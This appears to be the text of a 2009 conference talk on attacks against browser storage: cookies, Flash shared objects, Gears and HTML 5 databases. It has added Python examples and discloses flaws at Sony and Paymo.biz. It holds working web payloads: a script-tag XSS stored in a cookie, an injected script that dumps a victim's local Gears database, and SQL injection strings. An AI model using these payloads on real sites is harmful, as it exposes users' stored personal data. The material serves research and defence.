Who Am I?

Company
• Zscaler - SaaS solution for web browser security
• VP, Security Research

Background
• SPI Dynamics - acquired by HP
• iDefense - acquired by VeriSign

• Web security
• Client-side vulnerabilities
• Fuzzing
Overview

Background

Data Privacy
• HTTP Cookies
• Flash Local SharedObjects

Data Integrity and Confidentiality
• Gears
• HTML 5 Structured Client Side Storage

Future
Background

Evolution of Web Applications

[Timeline figure, 2000 to 2009]
• Web 1.0 - largely static, site generated content
• Web 2.0 - dynamic, user generated content
• Web 3.0 - offline web applications
Milestones marked along the time axis: Time Warner/AOL merger; dot com bubble bursts; Google IPO; O'Reilly Media Web 2.0 Conference; Google Gears released; Safari 3.1 supports HTML 5 database storage.
Browser Storage

HTTP Cookies
• Initially supported by Mosaic Netscape v0.9 beta - released Oct. 13, 1994
• Internet Explorer v2.0 support in Oct. 1995
• Primarily used for personalization/tracking
• RFC 2109 recommends a minimum storage capacity of 4KB per cookie

Flash Local Shared Objects
• First introduced in Flash Player 6.0
• User controlled settings to manage 'Flash cookies' introduced in Flash Player 8.0
• Default storage capacity of 100KB per domain

(Google) Gears
• Launched May 31, 2007
• Full local relational database

HTML 5 Database Storage
• Supported by Safari 3.1, released March 18, 2008
• Full local relational database
HTTP Cookies
HTTP Cookies

History
• Mosaic Netscape v0.9 beta - Oct. 13, 1994
• Netscape filed its cookie patent in 1995

Uses
• Primarily used for tracking
• Allow sites to identify a combination of user, browser and computer

Limits
• Scoped by domain and path rather than by the full same origin policy: scheme and port are ignored, so a page served over http:// can read cookies set over https:// unless they carry the Secure flag
• RFC 2109 - HTTP State Management Mechanism
• At least 4096 bytes per cookie
• At least 20 cookies per unique host
• Controllable expiration

Attacks
• Cookie hijacking
• Cookie poisoning
Persistent csXSS

Sony Search

[Screenshot: Sony's site search, 'Your Results for "Sutton" in All of Sony', listing Legacy Recordings pages (The Partridge Family - Up To Date, Shopping Bag and Sound Magazine; Fred Hammond - Somethin' Bout Love; Nick Heyward) with a "Your Recent Searches" sidebar showing the terms Sutton and Michael, and a "Top Searches" box]
Sony Persistent csXSS

[Screenshot: Safari's cookie dialog for sony.com. Alongside tracking (s_vi, s_cc), load balancer (NSC_...) and session (JSESSIONID) cookies scoped to "/", www.sony.com sets sonysearch_recent_searches with path /SonySearch, expiring March 14, 2009, whose contents are the user's own recent search terms ("Michael Sutton"). The search history exists only in this cookie on the client.]
Sony Persistent csXSS

[Screenshot: www.sony.com with the results header reading 'Your Results for "<script>alert("...is vulnerable to XSS")</script>" in All' and an alert box from http://www.sony.com saying "...is vulnerable to XSS". The term was stored in the recent-searches cookie and rendered without encoding on every return visit.]
Persistent csXSS

Unique Aspects
• Persistent only on the client - the payload lives in the victim's own cookie, never on the server
• Automatically triggered whenever the page is revisited

Attack Potential
• Leverage for user-specific XSS attacks
• Not possible with traditional persistent XSS, where the stored payload is served to every visitor alike
• Inform the attacker whenever you've returned to a site
• Timing is an issue with attacks such as CSRF: a cookie-resident payload fires exactly when the victim is back on the site, and typically logged in, so the attacker no longer has to guess when a forged request will ride on a valid session

Prevalence
• Surprisingly common, especially on sites which feature a search history
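To make the mechanism concrete, here is an added Python example (mine, not code from the talk or from Sony) that models the pattern: a search handler records each term in a client-side cookie and the results page renders "Your Recent Searches" from that cookie. The cookie name is taken from the Sony screenshot; the pipe-separated, percent-encoded value layout is an assumption. simulate_revisit plays two visits by one browser and shows that the vulnerable renderer re-emits the script on a plain revisit with no query string, while the fixed renderer escapes it:

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import quote, unquote

# Cookie name from the Sony screenshot; the "|"-separated, percent-encoded
# value layout is an assumption made for this example.
COOKIE = "sonysearch_recent_searches"
MAX_RECENT = 5

# The payload shown on the Sony slide.
PAYLOAD = '<script>alert("...is vulnerable to XSS")</script>'


def parse_recent(cookie_value):
    """Split the stored history back into search terms."""
    return [unquote(t) for t in cookie_value.split("|") if t]


def update_recent(cookie_header, term):
    """Server side of a search request: return the new cookie value that
    records `term` at the head of the visitor's search history."""
    jar = SimpleCookie(cookie_header or "")
    recent = parse_recent(jar[COOKIE].value) if COOKIE in jar else []
    recent = [term] + [t for t in recent if t != term]
    return "|".join(quote(t, safe="") for t in recent[:MAX_RECENT])


def render_recent_vulnerable(cookie_value):
    """'Your Recent Searches' the way the Sony page did it: the stored term
    is interpolated into the markup untouched."""
    items = "".join("<li>%s</li>" % t for t in parse_recent(cookie_value))
    return "<h3>Your Recent Searches</h3><ul>%s</ul>" % items


def render_recent_fixed(cookie_value):
    """Same block with output encoding; the cookie still carries the payload,
    but the browser sees it as text."""
    items = "".join("<li>%s</li>" % html.escape(t, quote=True)
                    for t in parse_recent(cookie_value))
    return "<h3>Your Recent Searches</h3><ul>%s</ul>" % items


def simulate_revisit(render):
    """Two visits by one browser: a search carrying the payload, then a plain
    revisit with no query string. Returns the HTML the revisit produces."""
    jar = {}
    # Visit 1: the victim (or a link the attacker sent them) searches for PAYLOAD.
    jar[COOKIE] = update_recent(None, PAYLOAD)
    # Visit 2: later the victim simply comes back. The server renders nothing
    # but the history it stored in the client's own cookie.
    cookie_header = "; ".join("%s=%s" % kv for kv in jar.items())
    stored = SimpleCookie(cookie_header)[COOKIE].value
    return render(stored)


if __name__ == "__main__":
    print(simulate_revisit(render_recent_vulnerable))
    print(simulate_revisit(render_recent_fixed))
```

The fix is output encoding at the point the stored term is written into the page. Cookie flags such as HttpOnly or Secure do nothing here: the server itself reads the cookie back and injects its contents into the response, so the value must be treated as untrusted input on every request, not just the one that created it.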
Flash Local SharedObjects

Flash LSOs

History
• Flash Player 6.0 - March 2002
• Flash Player 8.0 - user controlled settings to manage 'Flash cookies'

Uses
• Primarily used for tracking/default settings
• Larger capacity permits use for additional purposes
• Popular - my laptop currently has LSOs from 102 domains - all from regular browsing

Properties
• Default storage of 100KB per domain -> can be raised to unlimited
• No expiration
• Difficult to delete - not tied to browser caches, so clearing the browser's cookies leaves them in place

Attacks
• Cookie hijacking
• Cookie poisoning
• Data leakage
What's Stored in Flash LSOs?

Tracking Identifiers
• Most common

Configuration Settings
• Typical on audio/video streaming sites

Authentication Credentials
• Pandora (encoded password)

Easter Eggs
• "Hey. You've just found another easter egg. Congrats - you gained nothing :)"
• Portal - Flash game by Armor Games
SharedObject Sandboxing

From "Programming Adobe ActionScript 3.0 for Adobe Flash", section SharedObjects:

"Flash Player provides the ability to use shared objects, which are ActionScript objects that persist outside of a SWF file, either locally on a user's file system or remotely on an RTMP server. Shared objects, like other media in Flash Player, are partitioned into security sandboxes. However, the sandbox model for shared objects is somewhat different, because shared objects are not resources that can ever be accessed across domain boundaries. Instead, shared objects are always retrieved from a shared object store that is particular to the domain of each SWF file that calls methods of the SharedObject class. Usually a shared object store is even more particular than a SWF file's domain: by default, each SWF file uses a shared object store particular to its entire origin URL."
Flash LSO Storage Locations

Windows XP
$user\Application Data\Macromedia\Flash Player\#SharedObjects

Windows Vista (in each user's profile)
$user\AppData\Roaming\Macromedia\Flash Player\#SharedObjects

Mac OS X
~/Library/Preferences/Macromedia/Flash Player/#SharedObjects

Linux
/home/$user/.macromedia/Flash_Player/#SharedObjects

Beneath #SharedObjects sits one randomly named directory per Flash Player profile, then one directory per domain; the SWF's own path follows when the LSO was created without an explicit localPath.
LSO Files

Format
• Binary files
• *.sol extension
• Store ActionScript values serialized as AMF - in practice mostly strings and numbers

SharedObject readers
• FD3
• SOLReader

User Control
• Website Storage Settings in the Flash Player Settings Manager
• Firefox add-ons - Objection, Better Privacy
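As an added example (mine, not one of the readers named above and not code from the talk), the following Python reads AMF0-encoded .sol files directly, which is all a SharedObject reader does. The header layout (00 BF, 32-bit big-endian body length, "TCSO", six fixed bytes, the object name, a version word) and the AMF0 type markers are the format Flash Player 6 to 8 wrote; build_sol exists only to construct test input, and the profile directory and host name used in demo() are made up. Files whose version word is 3 (AMF3, written by Flash Player 9+ SWFs using the default objectEncoding) are rejected rather than misparsed:

```python
import struct
import tempfile
from pathlib import Path

# AMF0 type markers that appear in .sol files written with objectEncoding = AMF0
AMF0_NUMBER, AMF0_BOOLEAN, AMF0_STRING, AMF0_NULL, AMF0_UNDEFINED = 0x00, 0x01, 0x02, 0x05, 0x06
SOL_MAGIC = b"\x00\xbf"   # first two bytes of every .sol file
SOL_TAG = b"TCSO"         # follows the 32-bit big-endian body length


def _amf0_encode(value):
    """Serialise one ActionScript value (the scalar types a typical LSO holds)."""
    if value is None:
        return bytes([AMF0_NULL])
    if isinstance(value, bool):                     # bool before int: True is an int
        return bytes([AMF0_BOOLEAN, 1 if value else 0])
    if isinstance(value, (int, float)):
        return bytes([AMF0_NUMBER]) + struct.pack(">d", float(value))
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return bytes([AMF0_STRING]) + struct.pack(">H", len(raw)) + raw
    raise TypeError("unsupported value %r" % (value,))


def build_sol(name, data):
    """Construct an AMF0 .sol image (test input only; real files come from the
    #SharedObjects directories listed above)."""
    name_raw = name.encode("utf-8")
    body = SOL_TAG + b"\x00\x04\x00\x00\x00\x00"
    body += struct.pack(">H", len(name_raw)) + name_raw
    body += b"\x00\x00\x00\x00"                     # encoding version: 0 = AMF0, 3 = AMF3
    for key, value in data.items():
        key_raw = key.encode("utf-8")
        body += struct.pack(">H", len(key_raw)) + key_raw + _amf0_encode(value) + b"\x00"
    return SOL_MAGIC + struct.pack(">I", len(body)) + body


def _amf0_decode(buf, pos):
    """Decode one AMF0 value at buf[pos]; return (value, position after it)."""
    marker = buf[pos]
    pos += 1
    if marker == AMF0_NUMBER:
        return struct.unpack_from(">d", buf, pos)[0], pos + 8
    if marker == AMF0_BOOLEAN:
        return buf[pos] != 0, pos + 1
    if marker == AMF0_STRING:
        n = struct.unpack_from(">H", buf, pos)[0]
        return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
    if marker in (AMF0_NULL, AMF0_UNDEFINED):
        return None, pos
    raise ValueError("unsupported AMF0 marker 0x%02x at offset %d" % (marker, pos - 1))


def parse_sol(buf):
    """Return (shared object name, {key: value}) for an AMF0 .sol image."""
    if buf[:2] != SOL_MAGIC or buf[6:10] != SOL_TAG:
        raise ValueError("not a .sol file")
    length = struct.unpack_from(">I", buf, 2)[0]
    if length != len(buf) - 6:
        raise ValueError("length field %d != %d body bytes" % (length, len(buf) - 6))
    pos = 16                                        # past TCSO and the six fixed bytes
    n = struct.unpack_from(">H", buf, pos)[0]
    name = buf[pos + 2:pos + 2 + n].decode("utf-8")
    pos += 2 + n
    version = struct.unpack_from(">I", buf, pos)[0]
    pos += 4
    if version != 0:
        raise ValueError("AMF%d encoding not handled by this reader" % version)
    data = {}
    while pos < len(buf):
        n = struct.unpack_from(">H", buf, pos)[0]
        key = buf[pos + 2:pos + 2 + n].decode("utf-8")
        value, pos = _amf0_decode(buf, pos + 2 + n)
        if buf[pos] != 0:                           # every entry ends with a 0x00 byte
            raise ValueError("missing entry terminator at offset %d" % pos)
        data[key] = value
        pos += 1
    return name, data


def scan_shared_objects(root):
    """Walk a #SharedObjects tree and parse every .sol file beneath it."""
    root = Path(root)
    found = {}
    for path in sorted(root.rglob("*.sol")):
        try:
            found[str(path.relative_to(root))] = parse_sol(path.read_bytes())
        except ValueError as err:
            found[str(path.relative_to(root))] = ("unparsed", str(err))
    return found


def demo():
    """Write the LSO the ActionScript example below creates into a throwaway
    #SharedObjects tree (profile dir and host name are made up) and read it back."""
    root = Path(tempfile.mkdtemp())
    sol = root / "ABCDEFGH" / "michaelawsutton.googlepages.com" / "zscaler.sol"
    sol.parent.mkdir(parents=True)
    sol.write_bytes(build_sol("zscaler", {"firstname": "Michael", "lastname": "Sutton"}))
    return scan_shared_objects(root)
```

Point scan_shared_objects at one of the #SharedObjects paths above to inventory a real profile; the relative path of each file tells you which domain (and which SWF) wrote it, which is the quickest way to spot credentials or identifiers a site has parked in Flash storage.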
Reading/Writing From/To Flash Cookies

Limitations
• Same origin policy
• Origin determined by path - by default an LSO is scoped to the full URL of the SWF that wrote it
• Sites can write LSOs at a predefined level, e.g. SharedObject.getLocal("zscaler", "/"); the localPath must be the calling SWF's own path or one of its parent directories, so a SWF hosted anywhere under the domain can open an LSO written at "/"

Requirements
• Ability to upload SWF files
• Increasingly common on Web 2.0 sites
• Victim must visit the site with the uploaded content
Writing To a Flash Cookie

package {
    import flash.net.SharedObject;
    import flash.display.Sprite;

    public class zscaler extends Sprite {
        private var user:SharedObject;
        private var firstname:String;
        private var lastname:String;

        public function zscaler() {
            // Open (or create) the LSO named "zscaler", scoped to this SWF's URL
            user = SharedObject.getLocal("zscaler");
            firstname = "Michael";
            lastname = "Sutton";

            user.data.firstname = firstname;
            user.data.lastname = lastname;

            // Write the .sol file to disk now rather than when the SWF unloads
            user.flush();
        }
    }
}
Reading From a Flash Cookie

package {
    import flash.net.SharedObject;
    import flash.display.Sprite;
    import flash.text.TextField;
    import flash.text.TextFieldAutoSize;

    public class zscaler extends Sprite {
        private var user:SharedObject;
        private var firstname:String;
        private var lastname:String;

        public function zscaler() {
            var label:TextField;

            // Same name and default localPath as the writer, so the same .sol file is opened
            user = SharedObject.getLocal("zscaler");

            firstname = user.data.firstname;
            lastname = user.data.lastname;

            label = new TextField();
            label.autoSize = TextFieldAutoSize.LEFT;
            label.background = true;
            label.border = true;
            label.text = "Firstname: " + firstname + "\nLastname: " + lastname;
            addChild(label);

            user.flush();   // harmless here; nothing was modified
        }
    }
}
Reading From a Flash Cookie

[Screenshot: the reader SWF embedded in zscaler.html at http://michaelawsutton.googlepages.com displays "Firstname: Michael / Lastname: Sutton", the values the writer SWF stored in the LSO]
Pros/Cons of Flash Cookies

Pros
• Model increases the complexity of cookie stealing - reading an LSO requires getting a SWF onto the victim's domain rather than a one-line document.cookie read
• Sandboxing limits the scope of attacks - similar to HTTP cookies

Cons
• Greater default storage capacity (100KB) - increases the likelihood that storage will be used for sensitive data
• Difficult to delete
• No expiration
(Google) Gears

Gears

History
• Launched as Google Gears on May 31, 2007
• 'Google' dropped from the project title on its 1st anniversary

Purpose
• Initial - "offline-enabling applications"
• Overall - "close the gap between web apps and native apps by giving the browser new capabilities"

Primary components
• LocalServer - local HTTP/HTTPS capable server for delivering content
• Database - local implementation of the SQLite relational database for storing content
• WorkerPool - run resource intensive JavaScript in the background to improve performance

Security concerns
• Data confidentiality
• Data integrity
Gears Activation

Allow
• User must permit Gears access

Install
• SQLite database installed on the local file system

[Screenshot: the "Gears Security Warning" dialog - "The website below wants to store information on your computer using Gears. http://zscaler.paymo.biz", with the choices "I trust this site. Allow it to use Gears." / "Never allow this site" and Allow/Deny buttons - beside an Explorer window open at C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\c9doqcvk.default\Google Gears for Firefox, which holds the folder dot_store_http_zscaler_paymo_biz_client_2_0_client_html#localserver and the 6 KB file dot_store_http_zscaler_paymo_biz_client_2_0_client_html#database, both dated 2/4/2009]
Gears Storage Locations

Windows XP
• Internet Explorer: C:\Documents and Settings\<user>\Local Settings\Application Data\Google\Google Gears for Internet Explorer
• Firefox: C:\Documents and Settings\<user>\Local Settings\Application Data\Mozilla\Firefox\Profiles\{PROFILE}.default\Google Gears for Firefox
• Google Chrome: C:\Documents and Settings\<user>\Local Settings\Application Data\Google\Chrome\User Data\Default\Plugin Data\Google Gears

Windows Vista
• Internet Explorer: C:\Users\<user>\AppData\LocalLow\Google\Google Gears for Internet Explorer
• Firefox: C:\Users\<user>\AppData\Local\Mozilla\Firefox\Profiles\{PROFILE}.default\Google Gears for Firefox
• Google Chrome: C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Plugin Data\Google Gears

Mac OS X
• Firefox: /Users/<user>/Library/Caches/Firefox/Profiles/{PROFILE}.default/Google Gears for Firefox
• Safari: ~/Library/Application Support/Google/Google Gears for Safari

Linux
• Firefox: ~/.mozilla/firefox/{PROFILE}.default/Google Gears for Firefox

Windows Mobile
• Mobile Internet Explorer: \Application Data\Google\Google Gears for Internet Explorer
csSQLi

csSQLi

Definition
• Ability to read/write to/from a database stored on a client machine

Exposure
• Browser databases are accessed via JavaScript
• XSS on a vulnerable site can expose any web browser to csSQLi, regardless of patch level - the injected script runs in the site's origin and therefore receives the site's own database handle

Affected technologies
• Gears
• HTML 5
A Big Thank You To Paymo.biz

Timeline
• Feb. 4 - Vulnerability reported to Paymo.biz
• Feb. 5 - Initial response requesting additional information
• Feb. 5-9 - Additional correspondence
• Feb. 9 - Fix implemented

Thank You
Paymo went out of their way to quickly respond to the reported vulnerability in order to protect their clients. They were gracious and a pleasure to work with. Web application vendors everywhere can learn from their example.

...and they offered a free year of service! How's that for gratitude.
Paymo Injection Point

<h2>SQLi</h2>
<p><strong>Client</strong>
<a href="/clients/view/?id=16392">Default Client</a></p>
<p>***injection_point***</p>
<div style="float: left; padding-bottom: 10px;">

Injection point
• Within a paragraph tag
• Tag will need to be closed with </p>

Twitter Questions: zscaler sutton | Copyright 2009 Zscaler, Inc.

Read Paymo Data

</p>                                                        <!-- close the paragraph tag -->
<script type="text/javascript"
        src="http://code.google.com/apis/gears/gears_init.js"></script>   <!-- include the Gears API -->
<script type="text/javascript">
var db = google.gears.factory.create('beta.database');
// open the existing local database (the <name>#database file shown on the activation slide)
db.open('dot_store_http_zscaler_paymo_biz_client_2_0_client_html');
var data = '';   // the version shown in the talk left this uninitialised, hence the "undefined" prefix in the dump
// execute SQL query
var rs = db.execute('SELECT * FROM DOJO_STORAGE');
while (rs.isValidRow()) {
  data = data + (rs.field(0) + '@' + rs.field(1));
  data = data + '\n';
  rs.next();
}
alert(data);
rs.close();
</script>
<p>
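The script above runs inside the victim's browser. An added Python example (mine, not code from the talk or from Paymo) shows the offline half of the same attack: once an attacker has a copy of the <origin>#database file, or simply enables the application on their own machine, sqlite3 yields the schema from sqlite_master and every row without any of the JavaScript. The DOJO_STORAGE table name and the namespace@key output format come from the slides; the column names and all rows are constructed for the example:

```python
import os
import sqlite3
import tempfile

# Constructed sample rows shaped like the Paymo dump on the next slide
# (namespace@key per line). DOJO_STORAGE is the table name from the slide;
# the column names namespace/name/value are an assumption.
SAMPLE_ROWS = [
    ("_dot", "oldVersion", "1.0"),
    ("_dot", "justDebugged", "false"),
    ("default", "sessionId", "3f9c0b2a-constructed"),
    ("default", "userInfo", '{"name": "Example User", "email": "user@example.com"}'),
    ("default", "projects", '[{"id": 1, "name": "Internal"}]'),
    ("default", "time_tracked_today", "02:15"),
]


def make_sample_store(path):
    """Create a SQLite file shaped like <origin>#database so the readers have input."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE DOJO_STORAGE (namespace TEXT, name TEXT, value TEXT)")
    con.executemany("INSERT INTO DOJO_STORAGE VALUES (?, ?, ?)", SAMPLE_ROWS)
    con.commit()
    con.close()


def schema(path):
    """Recover the structure from sqlite_master: what a server-side SQLi attack
    must tease out of error messages or brute force is one query here."""
    con = sqlite3.connect(path)
    rows = con.execute(
        "SELECT type, name, sql FROM sqlite_master WHERE sql IS NOT NULL ORDER BY name"
    ).fetchall()
    con.close()
    return rows


def dump(path):
    """Every row of every table, keyed by table name (the offline counterpart of
    the SELECT * the injected script runs in the browser)."""
    con = sqlite3.connect(path)
    tables = [t for (t,) in con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    out = {}
    for table in tables:
        cur = con.execute('SELECT * FROM "%s"' % table.replace('"', '""'))
        out[table] = {"columns": [c[0] for c in cur.description], "rows": cur.fetchall()}
    con.close()
    return out


def list_keys(path):
    """The namespace@key listing the slide's script builds with rs.field(0) + '@' + rs.field(1)."""
    con = sqlite3.connect(path)
    keys = ["%s@%s" % (ns, name)
            for ns, name in con.execute("SELECT namespace, name FROM DOJO_STORAGE")]
    con.close()
    return keys


def demo():
    """Build the sample store in a temporary directory and run all three readers.
    The file name imitates Gears' <name>#database convention for a made-up origin."""
    path = os.path.join(tempfile.mkdtemp(), "dot_store_http_example_test_client_html#database")
    make_sample_store(path)
    return {"schema": schema(path), "keys": list_keys(path), "tables": dump(path)}
```

Point schema() and dump() at a real store (for Firefox on XP, a file under the "Google Gears for Firefox" directory listed on the storage locations slide) to run them against live data; nothing in the readers depends on the sample.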
Paymo csSQLi

[Screenshot: the Paymo timetracker application (Dashboard, Clients, Reports, Invoices, Users, Timer) with an alert from http://zscaler.paymo.biz listing every namespace@key pair in the local Gears database:]

undefined_dot@oldVersion
_dot@justDebugged
default@sessionId
default@userInfo
default@projects
default@entries_Wed_Feb_04_2009_00_00_00_GMT_0000_GMT_Standard_Time_
default@Wed_Feb_04_... (cut off in the screenshot)
default@Sun_Feb_01_2009_00_00_00_GMT_0000_GMT_Standard_Time_Wed_Feb_04_2009_23_59_59_GMT_0000_GM... (cut off in the screenshot)
default@time_tracked_today
default@time_tracked_this_week
default@company_logo

(The "undefined" prefix on the first line is the injected script's uninitialised data variable being concatenated with the first row.)
Gears csSQLi

Built-in SQLi Protection
Secure   -> db.execute('insert into MyTable values (?)', [data]);
Insecure -> db.execute("insert into MyTable values ('" + data + "')");

Meaningless if a site is vulnerable to XSS - injected script calls db.execute() directly with whatever statement it likes, so no SQL injection is needed

67% of sites likely to have XSS [WhiteHat Security - December 2008]
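The two forms above differ by one line, and an added Python example (mine, not Gears code) makes the difference measurable with the sqlite3 module, which binds "?" parameters the same way Gears' db.execute does. insert_* returns how many rows a single statement added, lookup_* returns what a value comparison matches, and injected_script is the XSS case the slide calls meaningless: the attacker holds the same handle and writes the whole statement. MyTable is the slide's table name; the sample rows and payloads are constructed:

```python
import sqlite3

# Constructed sample data; MyTable is the table name from the slide.
SAMPLE = ["sessionId=3f9c0b2a", "userInfo=Example User", "company_logo=logo.png"]
INSERT_PAYLOAD = "x'), ('injected"        # turns one VALUES row into two
LOOKUP_PAYLOAD = "x' OR '1'='1"           # turns an equality test into "always true"


def fresh_db():
    """An in-memory stand-in for the Gears SQLite store, pre-filled with SAMPLE."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE MyTable (value TEXT)")
    con.executemany("INSERT INTO MyTable VALUES (?)", [(v,) for v in SAMPLE])
    return con


def _count(con):
    return con.execute("SELECT count(*) FROM MyTable").fetchone()[0]


def insert_secure(con, data):
    """The slide's 'Secure' form: the value is bound, so it is always one literal.
    Returns the number of rows the statement added."""
    before = _count(con)
    con.execute("INSERT INTO MyTable VALUES (?)", [data])
    return _count(con) - before


def insert_insecure(con, data):
    """The slide's 'Insecure' form: the value is spliced into the statement text,
    so a quote inside `data` changes the statement's structure."""
    before = _count(con)
    con.execute("INSERT INTO MyTable VALUES ('" + data + "')")
    return _count(con) - before


def lookup_secure(con, wanted):
    """Bound comparison: the payload is compared as a string and matches nothing."""
    return [v for (v,) in con.execute("SELECT value FROM MyTable WHERE value = ?", [wanted])]


def lookup_insecure(con, wanted):
    """Concatenated comparison: the payload's OR clause matches every row."""
    return [v for (v,) in con.execute("SELECT value FROM MyTable WHERE value = '" + wanted + "'")]


def injected_script(con):
    """What XSS hands the attacker: the application's own database handle. The
    binding API is irrelevant because the attacker supplies the whole statement."""
    return [v for (v,) in con.execute("SELECT value FROM MyTable")]
```

Binding protects the application's own statements from hostile data; it cannot protect the database from hostile code running in the same origin, which is the situation XSS creates.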
SQLi vs csSQLi

SQLi                                                          | csSQLi
--------------------------------------------------------------|-----------------------------------------------------------
Identify database structure through verbose error messages    | Database structure is readily accessible
or brute force                                                |
Online attacks                                                | Online and offline attacks
SQL statement must be vulnerable                              | XSS makes any site vulnerable, regardless of SQL syntax
csSQLi vs Cookie Theft

Question
• Couldn't I access the same information by stealing a user's cookie and accessing their online data?

Answer: No
• Cookie theft does not guarantee data access
  • Site may not use cookies for authentication
  • Additional ACLs (e.g. IP source address) would prevent access
  • Session credentials may have expired or the user may have logged out
• Offline data does not have to mirror online data
Sites Using Gears

[Logo wall: Google Reader, Passpack, WordPress, Zoho Writer, MindMeister, Paymo timetracker, Remember the Milk (beta), Buxfer, Gmail by Google (beta), plus one logo that did not survive extraction]
Pros/Cons of Gears

Pros
• Requires explicit user acceptance
• Has built in protections for vulnerabilities such as SQLi (parameter binding in db.execute)

Cons
• Despite default protections, being JavaScript based, it is open to attack should injection flaws such as XSS exist in the host application
• Implementing a secure technology on an insecure site invalidates the built in protections
• Increases the attack surface
• csSQLi is a reality - data can be remotely accessed from a local relational database
HTML 5
Structured Client Side Storage

HTML 5

History
• WHATWG began work on the specification in 2004
• W3C published the first public working draft Jan. 22, 2008

Scope
• New markup, APIs, error handling, etc.
• Includes a section on Structured Client-Side Storage

Storage types
• Session Storage - similar to HTTP session cookies with greater flexibility
• Local Storage - similar to HTTP persistent cookies with greater flexibility
• Database Storage - local relational database

Security concerns
• Data confidentiality
• Data integrity
HTML 5 Browser DB Support

♦ Internet Explorer 8
• Supports session storage and local storage, not database storage

♦ (browser name lost in extraction)
• Supports session storage and local storage, not database storage

♦ Safari
• Full support

♦ (browser name lost in extraction)
• No HTML 5 support

♦ Chrome
• "Despite using the latest branch of... the local database features didn't make it into Chrome's first release. Chrome's isolated sandbox system... would break the built-in WebKit database functionality..." [monkey_bites]
HTML 5 Database Storage Locations

Mac OS X
/Users/[username]/Library/Safari/Databases

Others
Currently, WebKit based browsers are the only ones supporting HTML 5 Database Storage
HTML 5 csSQLi

Resources
• Paper by Alberto Trivero describes potential abuse of HTML 5 structured client side storage
  http://trivero.secdiscover.com/html5whitepaper.pdf
• Various issues covered including csSQLi via XSS
• Same overall issue as demonstrated in the Paymo.biz example

Gears vs. HTML 5
• Blog postings from Google indicate a desire to ultimately make Gears compatible with the HTML 5 specification
Comparison of Local Storage Technologies

                      HTTP Cookies       Flash LSOs                   Gears              HTML 5
Explicit Acceptance   No                 No                           Yes                No
Storage Limit         4KB per cookie     Unlimited (100KB default)    Unlimited          Unlimited
Expiry                Custom             Never                        Never              Never
File Format           Text               Binary                       Binary (SQLite)    Binary (SQLite)
Deployment            Universal          Near universal               Minimal            Beta only
How Gears and HTML 5 Change the Game for Attackers

Offline
• Targets can be attacked regardless of current Internet connectivity
• e.g. a phishing email is read offline in Gmail, the link is clicked and a Gears-enabled application is attacked

Database structure
• No need to determine the data structure for SQLi - everyone has it: the attacker enables the same application and inspects the SQLite file on their own machine

Attack surface
• Potentially confidential data moves from a single, centralized location (server) to potentially millions of individual locations (clients)
• All targets (clients) can be attacked from one location (a web app with an XSS vuln.)
Predictions

Adoption
• Expect increased adoption of Gears thanks to favorable exposure from Gmail integration
• HTML 5 and Gears are unlikely to compete - Google has already expressed a desire to make Gears compatible with the HTML 5 specification

Vulnerable Sites
• Sites will continue to push the limits of widely adopted technologies such as HTTP cookies and Flash LSOs, resulting in exploitable vulnerabilities
• A significant portion of sites adopting local database technologies will have injection flaws that leave them open to attack

Attacks
• Attack prevalence will increase in proportion to adoption rates
Questions?

[Image: chalkboard gag with "I will use Google before asking dumb questions" written out repeatedly]

Michael Sutton - VP, Security Research
http://research.zscaler.com
Michael.Sutton@zscaler.com